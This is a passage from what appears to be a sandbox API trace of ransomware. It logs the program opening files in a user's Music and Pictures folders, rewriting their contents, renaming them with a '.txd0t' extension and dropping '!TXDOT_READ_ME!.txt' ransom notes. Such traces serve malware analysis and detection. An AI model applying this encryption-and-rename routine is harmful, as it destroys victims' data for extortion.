lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\5yor.m4a.txd0t")) returned 1 [0075.200] SetEvent (hEvent=0x404) returned 1 [0075.200] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0075.201] StrCpyW (in: psz1=0x414f680, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3" [0075.201] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t" [0075.201] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t") returned 0 [0075.201] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3", dwFileAttributes=0x80) returned 1 [0075.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\ftx5o-lqquv4qc8fxk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0075.202] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=100738) returned 1 [0075.202] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.202] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0075.203] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe747e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.203] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x18980, lpNumberOfBytesRead=0x414f640, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f640*=0x18980, lpOverlapped=0x0) returned 1 [0075.205] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe7680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.205] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x18980, lpNumberOfBytesWritten=0x414f644, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f644*=0x18980, lpOverlapped=0x0) returned 1 [0075.205] FlushFileBuffers (hFile=0x46c) returned 1 [0075.294] GetProcessHeap () returned 0xe30000 [0075.294] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12e) returned 0xeca148 [0075.294] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3" [0075.294] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3") returned="Ftx5O-lqQUv4Qc8fXk.mp3" [0075.294] StrCpyW (in: psz1=0xeca1a2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.295] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt") returned 1 [0075.295] GetProcessHeap () returned 0xe30000 [0075.295] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.295] CloseHandle (hObject=0x46c) returned 1 [0075.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\ftx5o-lqquv4qc8fxk.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\ftx5o-lqquv4qc8fxk.mp3.txd0t")) returned 1 [0075.298] SetEvent (hEvent=0x404) returned 1 [0075.298] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0075.299] StrCpyW (in: psz1=0x414f680, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav" [0075.299] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t" [0075.299] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t") returned 0 [0075.299] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav", dwFileAttributes=0x80) returned 1 [0075.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\jkfgwnnpdq3izeypax.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0075.300] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=73933) returned 1 [0075.300] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.300] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0075.301] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffedd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.301] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x120c0, lpNumberOfBytesRead=0x414f640, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f640*=0x120c0, lpOverlapped=0x0) returned 1 [0075.302] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffedf40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.302] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x120c0, lpNumberOfBytesWritten=0x414f644, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f644*=0x120c0, lpOverlapped=0x0) returned 1 [0075.303] FlushFileBuffers (hFile=0x46c) returned 1 [0075.443] GetProcessHeap () returned 0xe30000 [0075.443] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12e) returned 0xeca148 [0075.443] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav" [0075.443] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav") returned="JKFgwNnPDq3IzeypAX.wav" [0075.443] StrCpyW (in: psz1=0xeca1a2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.443] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt") returned 1 [0075.443] GetProcessHeap () returned 0xe30000 [0075.443] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.443] CloseHandle (hObject=0x46c) returned 1 [0075.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\jkfgwnnpdq3izeypax.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\jkfgwnnpdq3izeypax.wav.txd0t")) returned 1 [0075.446] SetEvent (hEvent=0x404) returned 1 [0075.446] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0075.448] StrCpyW (in: psz1=0x414f670, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3" [0075.448] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t" [0075.448] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t") returned 0 [0075.448] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3", dwFileAttributes=0x80) returned 1 [0075.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\tos-ewe0vccwoskwd1\\hn-oe9ufoj0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0075.448] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=79479) returned 1 [0075.448] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.448] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0075.449] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffec789, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.449] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x13670, lpNumberOfBytesRead=0x414f630, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f630*=0x13670, lpOverlapped=0x0) returned 1 [0075.451] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffec990, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.451] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x13670, lpNumberOfBytesWritten=0x414f634, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f634*=0x13670, lpOverlapped=0x0) returned 1 [0075.451] FlushFileBuffers (hFile=0x46c) returned 1 [0075.786] GetProcessHeap () returned 0xe30000 [0075.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x146) returned 0xe9b648 [0075.787] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3" [0075.787] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3") returned="HN-OE9UFOJ0.mp3" [0075.787] StrCpyW (in: psz1=0xe9b6c8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.787] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt") returned 0 [0075.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\tos-ewe0vccwoskwd1\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0075.821] WriteFile (in: hFile=0x464, lpBuffer=0x414f664*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x414f664*, lpNumberOfBytesWritten=0x414f660*=0x2, lpOverlapped=0x0) returned 1 [0075.823] FlushFileBuffers (hFile=0x464) returned 1 [0075.838] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x414f660*=0x7f0, lpOverlapped=0x0) returned 1 [0075.839] FlushFileBuffers (hFile=0x464) returned 1 [0075.875] CloseHandle (hObject=0x464) returned 1 [0075.875] GetProcessHeap () returned 0xe30000 [0075.875] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.875] CloseHandle (hObject=0x46c) returned 1 [0075.877] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\tos-ewe0vccwoskwd1\\hn-oe9ufoj0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\tos-ewe0vccwoskwd1\\hn-oe9ufoj0.mp3.txd0t")) returned 1 [0075.878] SetEvent (hEvent=0x404) returned 1 [0075.878] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0075.889] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif" [0075.889] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t" [0075.889] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t") returned 0 [0075.889] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif", dwFileAttributes=0x80) returned 1 [0075.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\gpnfvpmewkfc.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.889] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=12884) returned 1 [0075.889] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.890] WriteFile (in: hFile=0x460, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0075.890] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffcbac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.890] ReadFile (in: hFile=0x460, lpBuffer=0x380d020, nNumberOfBytesToRead=0x3250, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x3250, lpOverlapped=0x0) returned 1 [0075.890] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffcdb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.890] WriteFile (in: hFile=0x460, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x3250, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x3250, lpOverlapped=0x0) returned 1 [0075.890] FlushFileBuffers (hFile=0x460) returned 1 [0075.988] GetProcessHeap () returned 0xe30000 [0075.988] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0075.989] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif" [0075.989] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif") returned="gpNFvPMeWkFC.gif" [0075.989] StrCpyW (in: psz1=0xe9d78a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.989] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0075.989] GetProcessHeap () returned 0xe30000 [0075.989] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0075.989] CloseHandle (hObject=0x460) returned 1 [0075.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\gpnfvpmewkfc.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\gpnfvpmewkfc.gif.txd0t")) returned 1 [0075.991] SetEvent (hEvent=0x404) returned 1 [0075.991] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0075.994] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png" [0075.994] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t" [0075.994] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t") returned 0 [0075.994] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png", dwFileAttributes=0x80) returned 1 [0075.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\jndcerevktt-06-a0ux8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0075.994] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=43053) returned 1 [0075.994] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.994] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0075.994] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff55d3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.995] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0xa820, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0xa820, lpOverlapped=0x0) returned 1 [0075.995] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff57e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.995] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0xa820, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0xa820, lpOverlapped=0x0) returned 1 [0075.996] FlushFileBuffers (hFile=0x474) returned 1 [0076.128] GetProcessHeap () returned 0xe30000 [0076.128] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1330 [0076.128] StrCpyW (in: psz1=0xed1330, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png" [0076.128] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png") returned="JNDCEREvKtt-06-A0UX8.png" [0076.128] StrCpyW (in: psz1=0xed136a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.128] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.128] GetProcessHeap () returned 0xe30000 [0076.128] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1330 | out: hHeap=0xe30000) returned 1 [0076.128] CloseHandle (hObject=0x474) returned 1 [0076.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\jndcerevktt-06-a0ux8.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\jndcerevktt-06-a0ux8.png.txd0t")) returned 1 [0076.130] SetEvent (hEvent=0x404) returned 1 [0076.130] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0076.132] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png" [0076.132] StrCatW (in: 